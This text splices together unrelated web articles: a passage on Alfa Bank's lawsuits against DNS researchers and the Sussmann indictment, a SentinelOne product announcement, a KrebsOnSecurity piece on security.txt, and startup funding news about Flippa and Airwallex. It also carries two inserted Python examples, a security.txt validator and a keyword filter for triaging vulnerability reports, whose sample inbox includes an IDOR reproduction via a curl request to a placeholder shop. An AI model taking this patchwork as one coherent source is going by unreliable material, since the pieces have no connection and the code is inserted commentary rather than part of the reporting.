In June 2020, Alfa Bank filed two “John Doe” lawsuits, one in Pennsylvania and another in Florida. Their stated purpose was to identify the anonymous hackers behind the “highly sophisticated cyberattacks” that they claim were responsible for the mysterious DNS lookups.

Alfa Bank has so far subpoenaed at least 49 people or entities — including all of the security experts quoted in the 2016 media stories referenced above, and others who’d merely offered their perspectives on the matter via social media. At least 15 of those individuals or entities have since been deposed. Alfa Bank’s most recent subpoena was issued Aug. 26, 2021.

L. Jean Camp, a professor at the Indiana University School of Informatics and Computing, was among the first to publish some of the DNS data collected by the research group. In 2017, Alfa Bank sent Camp a series of threatening letters suggesting she was “a central figure” in what the company would later claim was “malicious cyber activity targeting its computer network.” The letters and responses from her attorneys are published on her website.

Camp’s attorneys and Indiana University have managed to keep her from being deposed by both Alfa Bank and John H. Durham, the special counsel appointed by the Trump administration to look into the origins of the Russia investigation (although Camp said Alfa Bank was able to obtain certain emails through the school’s public records request policy).

“If MIT had had the commitment to academic freedom that Indiana University has shown throughout this entire process, Aaron Swartz would still be alive,” Camp said.

Camp said she’s bothered that the Alfa Bank and Trump special counsel investigations have cast the researchers in such a sinister light, when many of those subpoenaed have spent a lifetime trying to make the Internet more secure.

“Not including me, they’ve subpoenaed some people who are significant, consistent and important contributors to the security of American networks against the very attacks coming from Russia,” Camp said. “I think they’re using law enforcement to attack network security, and to determine the ways in which their previous attacks have been and are being detected.”

Nicholas Weaver, a lecturer at the computer science department at University of California, Berkeley, told KrebsOnSecurity he complied with the subpoena requests for specific emails he’d sent to colleagues about the DNS data, noting that Alfa Bank could have otherwise obtained them through the schools’ public records policy.

Weaver said Alfa Bank’s lawsuit has nothing to do with uncovering the truth about the DNS data, but rather with intimidating and silencing researchers who’ve spoken out about it.

“It’s clearly abusive, so I’m willing to call it out for what it is, which is a John Doe lawsuit for a fishing expedition,” Weaver said.

TURNABOUT IS FAIR PLAY

Among those subpoenaed and deposed by Alfa Bank was Daniel J. Jones, a former investigator for the FBI and the U.S. Senate who is perhaps best known for his role in leading the investigation into the U.S. Central Intelligence Agency’s use of torture in the wake of the Sept. 11 attacks.

Jones runs The Democracy Integrity Project (TDIP), a nonprofit in Washington, D.C. whose stated mission includes efforts to research, investigate and help mitigate foreign interference in elections in the United States and its allies overseas. In 2018, U.S. Senate investigators asked TDIP to produce and share a detailed analysis of the DNS data, which it did without payment. That lengthy report was never publicly released by the committee nor anyone else.

That is, until Sept. 14, 2021, when Jones and TDIP filed their own lawsuit against Alfa Bank. According to Jones’ complaint, Alfa Bank had entered into a confidentiality agreement regarding certain sensitive and personal information Jones was compelled to provide as part of complying with the subpoena.

Yet on Aug. 20, Alfa Bank attorneys sent written notice that it was challenging portions of the confidentiality agreement. Jones’ complaint asserts that Alfa Bank intends to publicly file portions of these confidential exhibits, an outcome that could jeopardize his safety.

This would not be the first time testimony Jones provided under a confidentiality agreement ended up in the public eye. TDIP’s complaint notes that before Jones met with FBI officials in 2017 to discuss Russian disinformation campaigns, he was assured by two FBI agents that his identity would be protected from exposure and that any information he provided to the FBI would not be associated with him.

Nevertheless, in 2018 the House Permanent Select Committee on Intelligence released a redacted report on Russian active measures. The report blacked out Jones’ name, but a series of footnotes in the report named his employer and included links to his organization’s website. Jones’ complaint spends several pages detailing the thousands of death threats he received after that report was published online.

THE TDIP REPORT

As part of his lawsuit against Alfa Bank, Jones published 40 pages from the 600+ page report he submitted to the U.S. Senate in 2018. From reviewing its table of contents, the remainder of the unpublished report appears to delve deeply into details about Alfa Bank’s history, its owners, and their connections to the Kremlin.

The report notes that unlike other domains the Trump Organization used to send mass marketing emails, the domain at issue — mail1.trump-email.com — was configured in such a way that would have prevented it from effectively sending marketing or bulk emails. Or at least prevented most of the missives sent through the domain from ever making it past spam filters.

Nor was the domain configured like other Trump Organization domains that demonstrably did send commercial email, Jones’ analysis found. Also, the mail1.trump-email.com domain was never once flagged as sending spam by any of the 57 different spam block lists published online at the time.

“If large amounts of marketing emails were emanating from mail1.trump-email.com, it’s likely that some receivers of those emails would have marked them as spam,” Jones’ 2018 report reasons. “Spam is nothing new on the internet, and mass mailings create easily observed phenomena, such as a wide dispersion of backscatter queries from spam filters. No such evidence is found in the logs.”

However, Jones’ report did find that mail1.trump-email.com was configured to accept incoming email. Jones cites testing conducted by one of the researchers who found the mail1.trump-email.com rejected messages with an automated reply saying the server couldn’t accept messages from that particular sender.

“This test reveals that either the server was configured to reject email from everyone, or that the server was configured to accept only emails from specific senders,” TDIP wrote.

The report also puts a finer point on the circumstances surrounding the disappearance of that Trump Organization email domain just two days after The New York Times shared the DNS data with Alfa Bank’s representatives.

“After the record was deleted for mail1.trump-email.com on Sept. 23, 2016, Alfa Bank and Spectrum Health continued to conduct DNS lookups for mail1.trump-email.com,” reads the report. “In the case of Alfa Bank, this behavior persisted until late Friday night on Sept. 23, 2016 (Moscow time). At that point, Alfa Bank ceased its DNS lookups of mail1.trump-email.com.”

Less than ten minutes later, a server assigned to Alfa Bank was the first source in the DNS data-set examined (37 million DNS records from January 1, 2016 to January 15, 2017) to conduct a DNS look-up for the server name ‘trump1.contact-client.com.’ The answer received was 66.216.133.29 — the same IP address used for mail1.trump-email.com that was deleted in the days after The New York Times inquired with Alfa Bank about the unusual server connections.

“No servers associated with Alfa Bank ever conducted a DNS lookup for trump1.contact-client.com again, and the next DNS look-up for trump1.contact-client.com did not occur until October 5, 2016,” the report continues. “Three of these five look-ups from October 2016 originated from Russia.”

A copy of the complaint filed by Jones against Alfa Bank is available here (PDF).

THE SUSSMANN INDICTMENT

The person who first brought the DNS data to the attention of the FBI in Sept. 2016 was Michael Sussmann, a 57-year-old cybersecurity lawyer and former computer crimes prosecutor who represented the Democratic National Committee and Hillary Clinton’s presidential campaign.

Last week, the special counsel Durham indicted Sussmann on charges of making a false statement to the FBI. The New York Times reports the accusation focuses on a meeting Sussmann had Sept. 19, 2016 with James A. Baker, the FBI’s top lawyer at the time. Sussmann had reportedly met with Baker to discuss the DNS data uncovered by the researchers.

“The indictment says Mr. Sussmann falsely told the F.B.I. lawyer that he had no clients, but he was really representing both a technology executive and the Hillary Clinton campaign,” The Times wrote.

Sussmann has pleaded not guilty to the charges.

ANALYSIS

The Sussmann indictment refers to the various researchers who contacted him in 2016 by placeholder names, such as Tech Executive-1, Researcher-1 and Researcher-2. The tone of the indictment reads as if it were describing a vast web of nefarious or illegal activities, although it does not attempt to address the veracity of any specific concerns raised by the researchers. Here is one example:

“From in or about July 2016 through at least in or about February 2017, however, Originator-1, Researcher-1, and Researcher-2 also exploited Internet Company-1’s data and other data to assist Tech Executive-1 in his efforts to conduct research concerning Trump’s potential ties to Russia.”

Quoting from emails between Tech Executive-1 and the researchers, the indictment makes clear that Mr. Durham has subpoenaed many of the same researchers who’ve been subpoenaed and/or deposed in the concurrent John Doe lawsuits from Russia’s Alfa Bank.

To date, Alfa Bank has yet to name a single defendant in its lawsuits. In the meantime, the Sussmann indictment is being dissected by many users on social media who have been closely following the Trump administration’s inquiry into the Russia investigation. The majority of these social media posts appear to be crowdsourcing an effort to pinpoint the real-life identities behind the placeholder names in the indictment.

At one level, it doesn’t matter which explanation of the DNS data you believe: There is a very real possibility that the way this entire inquiry has been handled could negatively affect the FBI’s ability to collect crucial and sensitive investigative tips for years to come.

After all, who in their right mind is going to volunteer confidential information to the FBI if they fear there’s even the slightest chance that future shifting political winds could end up seeing them prosecuted, threatened with physical violence or death on social media, and/or exposed to expensive legal fees and depositions from private companies as a result?

Such a perception could give rise to a sort of “chilling effect,” discouraging honest, well-meaning people from speaking up when they suspect or know about a potential threat to national security or sovereignty.

This would be a less-than-ideal outcome in the context of today’s top cyber threat for most organizations: Ransomware. With few exceptions, the U.S. government has watched helplessly as organized cybercrime gangs — many of whose members hail from Russia or from former Soviet nations that are friendly to Moscow — have extorted billions of dollars from victims, and disrupted or ruined countless businesses.

To help shift the playing field against ransomware actors, the Justice Department and other federal law enforcement agencies have been trying to encourage more ransomware victims to come forward and share sensitive details about their attacks. The U.S. government has even offered up to $10 million for information leading to the arrest and conviction of cybercriminals involved in ransomware.

But given the way the government has essentially shot all of the messengers with its handling of the Sussmann case, who could blame those with useful and valid tips if they opted to stay silent?

Feature Spotlight: Introducing Singularity™ Conditional Policy

While security is taking the front row for many organizations, we still see too many others getting breached, facing the realities of ransomware, data theft, and extortion. These gaps require security professionals to be more efficient, flexible, and ready to face the changes enterprises need to be competitive and grow. Cybercriminals can target any organization, and that is why we have seen organizations investing time and resources in extending their security capabilities in detection, response, and recovery.

Two significant factors contribute to an effective cyber threat defense. First, prevention capabilities are all about blocking initial access to attackers; second, efficient detection and response are needed should a device be compromised.

Looking at prevention more closely, one major challenge is that most security policies are typically generic. At best, there might be a difference between High-Value-Asset (HVA)-type endpoints versus standard endpoints, but all security policies treat endpoints as equals regardless of whether the endpoint is considered compromised or not. Complex security policies often degrade the end-user experience, while light policies increase the available attack surface.

But what if security policies could be situationally aware, automatically dialing security enforcement up or back depending on the endpoint’s risk status?

If we could do this, organizations would be able to make risk-based decisions. Today, SentinelOne is introducing Singularity Conditional Policy, a new Zero Trust Network (ZTN) feature that dynamically applies additional security controls to devices that may be compromised, then automatically unwinds those restrictions once the device is deemed threat-free. In this way, Singularity Conditional Policy supports organizations in implementing ZTN concepts on the endpoint.

Introducing Singularity Conditional Policy

Singularity Conditional Policy is the world’s first endpoint-centric Conditional Policy Engine. Organizations can choose what their security configuration for healthy endpoints should be and choose a different configuration for risky endpoints. With this capability, we empower organizations to dynamically change security configurations based on the risk level of the endpoint.

Endpoints are no longer trusted by default but rather are continuously verified for their health state. When an active threat impacts a SentinelOne-protected endpoint, Singularity Conditional Policy temporarily moves the endpoint to the risky endpoint group and applies the respective security configuration. Once the threat is remediated, the endpoint moves back to the healthy endpoint group and is assigned its old security configuration. In this way, Singularity Conditional Policy helps reduce the attack surface and prevent potential further damage.

Singularity Conditional Policy is available for all SentinelOne customers. To enable Singularity Conditional Policy, just follow these two simple steps.

1. Create an Endpoint Group and Configure Relevant Security Controls

In the first step, you create a new endpoint group where compromised endpoints will be transferred in real-time by the Singularity Conditional Policy Engine.

Once the new endpoint group is created, you can configure the relevant security policies.

For example, you might want to enable protection mode for suspicious activities, ensure that compromised endpoints can’t communicate with specific domains or IP ranges, and prevent usage of USB or Bluetooth peripherals.

Create New Endpoint Group and Configure Security Policies

2. Install Singularity Conditional Policy

Now that you have your risky endpoint group created and the security policies configured, you can visit the Singularity Marketplace and simply install the Singularity Conditional Policy app.

Install Singularity Conditional Policy app through Singularity Marketplace

Real-Time Security Enforcement with Singularity Conditional Policy

Once this Zero Trust app is activated, you are all set: the Singularity Conditional Policy Engine is enabled. Moving forward, in the event that an endpoint is compromised, it will move in real-time to the risky endpoint group and increase the security enforcements. Once the threat is remediated, the endpoint will move back to its original group.

Singularity Conditional Policy moving compromised endpoint to risky endpoint group and moving back to the original group once the threat is contained.

Summary

SentinelOne continues to lead the way with innovations aimed at keeping organizations safe while supporting the operational challenges of business growth. The Singularity Conditional Policy app is part of SentinelOne’s ZTN strategy, helping organizations protect against, detect, respond to and recover from cyber threats. Our endpoint-centric ZTN approach, which continuously verifies endpoint health rather than trusting a device by default, makes it possible to evaluate the health state of endpoints and adjust security enforcement based on that state.

We can no longer assume that because the logged-on user is known to an organization, they should be safe and granted access to all corporate services and resources. Endpoints can no longer be treated equally without considering their risk profile.

Instead, security policies must be situationally-aware and dynamically enforced. Singularity Conditional Policy is SentinelOne’s first endpoint-centric Conditional Policy Engine that is now available to all SentinelOne customers. To find out more contact us or request a free demo.



Does Your Organization Have a Security.txt File?

It happens all the time: Organizations get hacked because there isn’t an obvious way for security researchers to let them know about security vulnerabilities or data leaks. Or maybe it isn’t entirely clear who should get the report when remote access to an organization’s internal network is being sold in the cybercrime underground.

In a bid to minimize these scenarios, a growing number of major companies are adopting “Security.txt,” a proposed new Internet standard that helps organizations describe their vulnerability disclosure practices and preferences.

An example of a security.txt file. Image: Securitytxt.org.

The idea behind Security.txt is straightforward: The organization places a file called security.txt in a predictable place. The draft standard names example.com/.well-known/security.txt as the location to use, with example.com/security.txt at the site root kept as a legacy fallback, so anyone looking for the file knows exactly where to check. What’s in the security.txt file varies somewhat, but most include links to information about the entity’s vulnerability disclosure policies and a contact email address.

The security.txt file made available by USAA, for example, includes links to its bug bounty program; an email address for disclosing security related matters; its public encryption key and vulnerability disclosure policy; and even a link to a page where USAA thanks researchers who have reported important cybersecurity issues.

Other security.txt disclosures are less verbose, as in the case of HCA Healthcare, which lists a contact email address, and a link to HCA’s “responsible disclosure” policies. Like USAA and many other organizations that have published security.txt files, HCA Healthcare also includes a link to information about IT security job openings at the company.
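Because the file lives at a fixed path and follows a simple "Field: value" layout, it is easy to fetch and check mechanically, both from the reporter's side (is there a contact here at all?) and from the publisher's side (is our file still valid?). The following is an added example, not code from the article or from the security.txt project: it builds the two candidate URLs, parses a constructed sample file modeled on the USAA-style contents described above, and flags the problems a reporter would trip over, such as a missing Contact line, a Contact that is not a URI, an expired file, or a field that appears more often than the draft allows. The example.com addresses are placeholders, and the field list reflects the draft specification at the time of writing.

```python
"""Parse and sanity-check a security.txt file (added example, not from the article)."""
from __future__ import annotations

from datetime import datetime, timezone
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Locations named by the security.txt draft: the .well-known path is the one to
# use; the top-level path is the legacy location still checked by many tools.
WELL_KNOWN_PATH = "/.well-known/security.txt"
LEGACY_PATH = "/security.txt"

# Fields defined in the draft. "Contact" must appear at least once;
# "Expires" and "Preferred-Languages" may appear at most once.
KNOWN_FIELDS = {
    "Contact", "Expires", "Encryption", "Acknowledgments",
    "Preferred-Languages", "Canonical", "Policy", "Hiring",
}
SINGLE_VALUED = {"Expires", "Preferred-Languages"}

# Constructed sample (placeholder domain), modeled on the kind of file the
# article describes: contact, key, policy, acknowledgments and hiring links.
SAMPLE_SECURITY_TXT = """\
# Our security address
Contact: mailto:security@example.com
Contact: https://example.com/report-vulnerability
Expires: 2030-12-31T23:59:00.000Z
Encryption: https://example.com/pgp-key.txt
Acknowledgments: https://example.com/hall-of-fame
Preferred-Languages: en, es
Canonical: https://example.com/.well-known/security.txt
Policy: https://example.com/disclosure-policy
Hiring: https://example.com/careers/security
"""


def candidate_urls(domain: str) -> List[str]:
    """Return the URLs to try, canonical location first, legacy location second."""
    return [f"https://{domain}{WELL_KNOWN_PATH}", f"https://{domain}{LEGACY_PATH}"]


def parse_security_txt(text: str) -> List[Tuple[str, str]]:
    """Return (field, value) pairs in file order.

    Blank lines and '#' comments are skipped. Field names are case-insensitive
    in the draft, so they are normalized to the canonical spelling.
    """
    canonical = {name.lower(): name for name in KNOWN_FIELDS}
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            pairs.append(("<malformed>", line))
            continue
        field, value = line.split(":", 1)
        pairs.append((canonical.get(field.strip().lower(), field.strip()), value.strip()))
    return pairs


def _is_contact_uri(value: str) -> bool:
    """Contact values are URIs; mailto:, tel: and https: are the usual schemes."""
    return urlsplit(value).scheme.lower() in {"mailto", "tel", "https", "http"}


def validate(pairs: List[Tuple[str, str]], now: datetime | None = None) -> List[str]:
    """Return a list of problems; an empty list means the file looks usable."""
    now = now or datetime.now(timezone.utc)
    problems: List[str] = []
    counts: Dict[str, int] = {}
    for field, value in pairs:
        counts[field] = counts.get(field, 0) + 1
        if field == "<malformed>":
            problems.append(f"line is not 'Field: value': {value!r}")
        elif field not in KNOWN_FIELDS:
            problems.append(f"unknown field {field!r}")
        elif field == "Contact" and not _is_contact_uri(value):
            problems.append(f"Contact is not a URI (use mailto:/https:/tel:): {value!r}")
        elif field == "Expires":
            try:
                expires = datetime.fromisoformat(value.replace("Z", "+00:00"))
            except ValueError:
                problems.append(f"Expires is not an ISO 8601 timestamp: {value!r}")
                continue
            if expires.tzinfo is None:  # treat a naive timestamp as UTC
                expires = expires.replace(tzinfo=timezone.utc)
            if expires <= now:
                problems.append(f"file expired on {value}; reporters may distrust it")
    if counts.get("Contact", 0) == 0:
        problems.append("no Contact field; the file gives reporters nowhere to send a report")
    if counts.get("Expires", 0) == 0:
        problems.append("no Expires field; stale contact details cannot be detected")
    for field in SINGLE_VALUED:
        if counts.get(field, 0) > 1:
            problems.append(f"{field} appears {counts[field]} times; at most one is allowed")
    return problems


if __name__ == "__main__":
    for url in candidate_urls("example.com"):
        print("would fetch:", url)
    parsed = parse_security_txt(SAMPLE_SECURITY_TXT)
    for field, value in parsed:
        print(f"{field:>20}: {value}")
    print("problems:", validate(parsed) or "none")
```

Publishers who adopt the file should run a check like this on a schedule, because an expired or unreachable security.txt is worse than none: a reporter who finds a stale file may reasonably conclude nobody is listening.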

Having a security.txt file can make it easier for organizations to respond to active security threats. For example, just this morning a trusted source forwarded me the VPN credentials for a major clothing retailer that were stolen by malware and made available to cybercriminals. Finding no security.txt file at the retailer’s site using gotsecuritytxt.com (which checks a domain for the presence of this contact file), KrebsOnSecurity sent an alert to the “security@” email address for the retailer’s domain.

Many organizations have long unofficially used (if not advertised) the email address security@[companydomain] to accept reports about security incidents or vulnerabilities. Perhaps this particular retailer also did so at one point, however my message was returned with a note saying the email had been blocked. KrebsOnSecurity also sent a message to the retailer’s chief information officer (CIO) — the only person in a C-level position at the retailer who was in my immediate LinkedIn network. I still have no idea if anyone has read it.

Although security.txt is not yet an official Internet standard as approved by the Internet Engineering Task Force (IETF), its basic principles have so far been adopted by at least eight percent of the Fortune 100 companies. According to a review of the domain names for the latest Fortune 100 firms via gotsecuritytxt.com, those include Alphabet, Amazon, Facebook, HCA Healthcare, Kroger, Procter & Gamble, USAA and Walmart.

There may be another good reason for consolidating security contact and vulnerability reporting information in one, predictable place. Alex Holden, founder of the Milwaukee-based consulting firm Hold Security, said it’s not uncommon for malicious hackers to experience problems getting the attention of the proper people within the very same organization they have just hacked.

“In cases of ransom, the bad guys try to contact the company with their demands,” Holden said. “You have no idea how often their messages get caught in filters, get deleted, blocked or ignored.”

GET READY TO BE DELUGED

So if security.txt is so great, why haven’t more organizations adopted it yet? It seems that setting up a security.txt file tends to invite a rather high volume of spam. Most of these junk emails come from self-appointed penetration testers who — without any invitation to do so — run automated vulnerability discovery tools and then submit the resulting reports in hopes of securing a consulting engagement or a bug bounty fee.

This dynamic was a major topic of discussion in these Hacker News threads on security.txt, wherein a number of readers related their experience of being so flooded with low-quality vulnerability scan reports that it became difficult to spot the reports truly worth pursuing further.

Edwin “EdOverflow” Foudil, the co-author of the proposed notification standard, acknowledged that junk reports are a major downside for organizations that offer up a security.txt file.

“This is actually stated in the specification itself, and it’s incredibly important to highlight that organizations that implement this are going to get flooded,” Foudil told KrebsOnSecurity. “One reason bug bounty programs succeed is that they are basically a glorified spam filter. But regardless of what approach you use, you’re going to get inundated with these crappy, sub-par reports.”

Often these sub-par vulnerability reports come from individuals who have scanned the entire Internet for one or two security vulnerabilities, and then attempted to contact all vulnerable organizations at once in some semi-automated fashion. Happily, Foudil said, many of these nuisance reports can be ignored or grouped by creating filters that look for messages containing keywords commonly found in automated vulnerability scans.
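The filtering Foudil describes can be done with nothing more than a list of phrases. The following is an added example, not code from the article or from the security.txt project, and the phrase lists and the three sample messages are constructed for illustration: it scores each incoming report against phrases typical of scanner dumps (tool names, generic header and DNS findings, requests for a reward) and against phrases that usually accompany a hand-written, reproducible report, then routes messages into a "review" or "low-priority" bucket. Nothing is discarded; the point is to let a human read the substantive reports first.

```python
"""Keyword triage for reports arriving at a security.txt contact address.
Added example; not from the article or from the security.txt project."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Phrases that show up in bulk, scanner-generated submissions. Illustrative
# only; tune against your own inbox.
SCANNER_PHRASES = [
    r"\bnikto\b", r"\bnmap\b", r"\bnessus\b", r"\bopenvas\b", r"\bacunetix\b",
    r"missing (?:security )?header", r"x-frame-options", r"clickjacking",
    r"content-security-policy", r"strict-transport-security", r"\bhsts\b",
    r"\bspf\b record", r"\bdmarc\b", r"server (?:version|banner) disclos",
    r"cookie (?:without|missing) (?:the )?(?:httponly|secure)",
    r"\bbounty\b", r"\breward\b", r"\bpaypal\b",
]
# Phrases that usually accompany a reproducible, hand-written report.
SUBSTANCE_PHRASES = [
    r"steps to reproduce", r"proof of concept|\bpoc\b", r"\bimpact\b",
    r"\bcurl\b", r"https?://\S+\?\S+=", r"\bpayload\b", r"\brequest\b",
]

# Constructed sample inbox: (subject, body).
REPORTS: List[Tuple[str, str]] = [
    ("Vulnerability found on your website",
     "Hello team, I have found that your website is missing security headers: "
     "X-Frame-Options, Content-Security-Policy and Strict-Transport-Security. "
     "This can lead to clickjacking. Please confirm the bounty reward. Regards"),
    ("IDOR in /api/v1/orders",
     "Steps to reproduce: 1. Log in as user A. 2. curl -H 'Authorization: Bearer <A>' "
     "https://shop.example/api/v1/orders?id=1002 returns user B's order. "
     "Impact: any customer can read any other customer's order history."),
    ("SPF record",
     "Your domain has no SPF record and DMARC policy is p=none. Spoofing is possible. "
     "I expect a reward."),
]


@dataclass
class Triage:
    subject: str
    scanner_hits: List[str]     # patterns from SCANNER_PHRASES that matched
    substance_hits: List[str]   # patterns from SUBSTANCE_PHRASES that matched
    bucket: str                 # "review" or "low-priority"


def triage(subject: str, body: str) -> Triage:
    """Classify one message. Substance always wins; scanner phrasing alone is
    only enough to de-prioritize when at least two such phrases match."""
    text = f"{subject}\n{body}".lower()
    scanner = [p for p in SCANNER_PHRASES if re.search(p, text)]
    substance = [p for p in SUBSTANCE_PHRASES if re.search(p, text)]
    bucket = "review" if substance or len(scanner) < 2 else "low-priority"
    return Triage(subject, scanner, substance, bucket)


def triage_inbox(reports: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group subjects by bucket so the review queue can be read first."""
    buckets: Dict[str, List[str]] = {"review": [], "low-priority": []}
    for subject, body in reports:
        buckets[triage(subject, body).bucket].append(subject)
    return buckets


if __name__ == "__main__":
    for bucket, subjects in triage_inbox(REPORTS).items():
        print(f"{bucket}:")
        for s in subjects:
            print("  ", s)
```

The low-priority bucket still deserves a periodic skim: a missing SPF or DMARC record is a real (if minor) finding, and a genuine researcher who writes tersely can land there too. A filter like this buys time; it does not replace judgment.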

Foudil said despite the spam challenges, he’s heard tremendous feedback from a number of universities that have implemented security.txt.

“It’s been an incredible success with universities, which tend to have lots of older, legacy systems,” he said. “In that context, we’ve seen a ton of valuable reports.”

Foudil says he’s delighted that eight of the Fortune 100 firms have already implemented security.txt, even though it has not yet been approved as an IETF standard. When and if security.txt is approved, he hopes to spend more time promoting its benefits.

“I’m not trying to make money off this thing, which came about after chatting with quite a few people at DEFCON [the annual security conference in Las Vegas] who were struggling to report security issues to vendors,” Foudil said. “The main reason I don’t go out of my way to promote it now is because it’s not yet an official standard.”

Has your organization considered or implemented security.txt? Why or why not? Sound off in the comments below.

Flippa raises $11M to match online asset and business buyers, sellers

Flippa, an online marketplace to buy and sell online businesses and digital assets, announced its first venture-backed round, an $11 million Series A, as it sees over 600,000 monthly searches from investors looking to connect with business owners.

OneVentures led the round and was joined by existing investors Andrew Walsh (former Hitwise CEO), Flippa co-founders Mark Harbottle and Matt Mickiewicz, 99designs, as well as new investors Catch.com.au founders Gabby and Hezi Leibovich; RetailMeNot.com founders Guy King and Bevan Clarke; and Reactive Media founders Tim O’Neill and Tim Fouhy.

The company, with bases in both Austin and Australia, was started in 2009 and facilitates exits for millions of online business owners, including those running e-commerce stores, blogs, SaaS products and apps; its newest data integration is with Shopify, Blake Hutchison, CEO of Flippa, told TechCrunch.

He considers Flippa to be “the investment bank for the 99%” of small businesses, providing an end-to-end platform that includes a proprietary valuation product for businesses, processing over 4,000 valuations each month, and a matching algorithm to connect sellers with qualified buyers.

Business owners can sell their companies directly through the platform and have the option to bring in a business broker or advisor. The company also offers due diligence and acquisition financing from Thrasio-owned Yardline Capital and a new service called Flippa Legal.

“Our strategy is verification at the source, i.e. data,” Hutchison said. “Users can currently connect to Stripe, QuickBooks Online, WooCommerce, Google Analytics and Admob for apps, which means they can expose their online business performance with one-click, and buyers can seamlessly assess financial and operational performance.”

Online retail, as a share of total retail sales, grew to 19.6% in 2020, up from 15.8% in 2019, driven largely by the global pandemic as sales shifted online while brick-and-mortar stores closed.

Meanwhile, Amazon has 6 million sellers, and Shopify sellers run over 1 million businesses. This has led to an emergence of e-commerce aggregators, backed by venture capital dollars, that are scooping up successful businesses to grow, finding many through Flippa’s marketplace, Hutchison said.

Flippa has over 3 million registered users and added 300,000 new registered users in the past 12 months. Overall transaction volume is growing 100% year over year. Though the company was bootstrapped for over a decade, its growth and opportunity drove Hutchison to go after venture capital dollars.

“There is a huge movement toward this being recognized as an asset class,” he said. “At the moment, the asset class is undervalued and driving a massive swarm as investors snap up businesses and aggregate them together. We see the future of these aggregators becoming ‘X company for apps’ or ‘X for blogs.’ ”

As such, the new funding will be used to double the company’s headcount to more than 100 people as it builds out its offices globally, as well as establishing outposts in Melbourne, San Francisco and Austin. The company will also invest in marketing and product development to scale its business valuation tool that Hutchison likens to the “Zillow Zestimate,” but for online businesses.

Nigel Dews, operating partner at OneVentures, has been following Flippa since it started. His firm is one of the oldest venture capital firms in Australia and has 30 companies in its portfolio focused on healthcare and technology.

He believes the company will create meaningful change for small businesses. The team combined with Flippa’s ability to connect buyers and sellers puts the company in a strong leadership position to take advantage of the marketplace effect.

“Flippa is an incredible opportunity for us,” he added. “You don’t often get a world-leading business in a brand new category with incredible tailwinds. We also liked that the company is based in Australia, but half of its revenue comes from the U.S.”

Airwallex raises $200M at a $4B valuation to double down on business banking

Business, now more than ever before, is going digital, and today a startup that’s building a vertically integrated solution to meet business banking needs is announcing a big round of funding to tap into the opportunity. Airwallex — which provides business banking services directly to businesses themselves as well as via a set of APIs that power other companies’ fintech products — has raised $200 million, a Series E round of funding that values the Australian startup at $4 billion.

Lone Pine Capital is leading the round, with new backers G Squared and Vetamer Capital Management, and previous backers 1835i Ventures (formerly ANZi), DST Global, Salesforce Ventures and Sequoia Capital China also participating.

The funding brings the total raised by Airwallex — which has head offices in Hong Kong and Melbourne, Australia — to $700 million, including a $100 million injection that closed out its Series D just six months ago.

Airwallex will be using the funding both to continue investing in its product and technology as well as to continue its geographical expansion and to focus on some larger business targets. The company has started to make some headway into Europe and the U.K. and that will be one big focus, along with the U.S.

The quick succession of funding and rising valuation underscore Airwallex’s traction to date around what CEO and co-founder Jack Zhang describes as a vertically integrated strategy.

That involves two parts. First, Airwallex has built all the infrastructure for the business banking services that it provides directly to businesses with a focus on small and medium enterprise customers. Second, it has packaged up that infrastructure into a set of APIs that a variety of other companies use to provide financial services directly to their customers without needing to build those services themselves — the so-called “embedded finance” approach.

“We want to own the whole ecosystem,” Zhang said to me. “We want to be like the Apple of business finance.”

That seems to be working out so far for Airwallex. Revenues were up almost 150% for the first half of 2021 compared to a year before, with the company processing more than US$20 billion for a global client portfolio that has quadrupled in size. In addition to tens of thousands of SMEs, it also, via APIs, powers financial services for other companies like GOAT, Papaya Global and Stake.

Airwallex got its start like many of the strongest startups do: It was built to solve a problem that the founders encountered themselves. In the case of Airwallex, Zhang tells me he had actually been working on a previous startup idea. He wanted to build the “Blue Bottle Coffee” of Asia Pacific out of Australia, and it involved buying and importing a lot of different materials, packaging and, of course, coffee from all around the world.

“We found that making payments as a small business was slow and expensive,” he said, since it involved banks in different countries and different banking systems, manual efforts to transfer money between them and many days to clear the payments. “But that was also my background — payments and trading — and so I decided that it was a much more fascinating problem for me to work on and resolve.”

Eventually one of his co-founders in the coffee effort came along, with the four co-founders of Airwallex ultimately including Zhang, along with Xijing Dai, Lucy Liu and Max Li.

It was 2014, and Airwallex got attention from VCs early on in part for being in the right place at the right time. A wave of startups building financial services for SMBs were definitely gaining ground in North America and Europe, filling a long-neglected hole in the technology universe, but there was almost nothing of the sort in the Asia Pacific region, and in those earlier days solutions were highly regionalized.

From there it was a no-brainer that starting with cross-border payments, the first thing Airwallex tackled, would soon grow into a wider suite of banking services involving payments and other cross-border banking services.

“In the last six years, we’ve built more than 50 bank integrations and now offer payments across 95 countries, payments through a partner network,” he added, with 43 of those offering real-time transactions. From that, it moved on to bank accounts and “other primitive stuff” with card issuance and more, he said, eventually building an end-to-end payment stack. 

Airwallex has tens of thousands of customers using its financial services directly, and they make up about 40% of its revenues today. The rest is the interesting turn the company decided to take to expand its business.

Airwallex had built all of its technology from the ground up itself, and it found that — given the wave of new companies looking for more ways to engage customers and become their one-stop shop — there was an opportunity to package that tech up in a set of APIs and sell that on to a different set of customers, those who also provided services for small businesses. That part of the business now accounts for 60% of Airwallex’s business, Zhang said, and is growing faster in terms of revenues. (The SMB business is growing faster in terms of customers, he said.)

A lot of embedded finance startups that base their business around building tech to power other businesses tend to stay at arm’s length from offering financial services directly to consumers. The explanation I have heard is that they do not wish to compete against their customers. Zhang said that Airwallex takes a different approach, by being selective about the customers it partners with, so that the financial services those partners offer are never in direct competition with Airwallex’s own. The GOAT marketplace for sneakers, or Papaya Global’s HR platform, are classic examples of this.

However, as Airwallex continues to grow, you can’t help but wonder whether one of those partners might like to gobble up all of Airwallex and take on some of that service provision role itself. In that context, it’s very interesting to see Salesforce Ventures returning to invest even more in the company in this round, given how widely the company has expanded from its early roots in software for salespeople into a massive platform providing a huge range of cloud services to help people run their businesses.

For now, it’s been the combination of its unique roots in Asia Pacific, plus its vertical approach of building its tech from the ground up, plus its retail acumen that has impressed investors and may well see Airwallex stay independent and grow for some time to come.

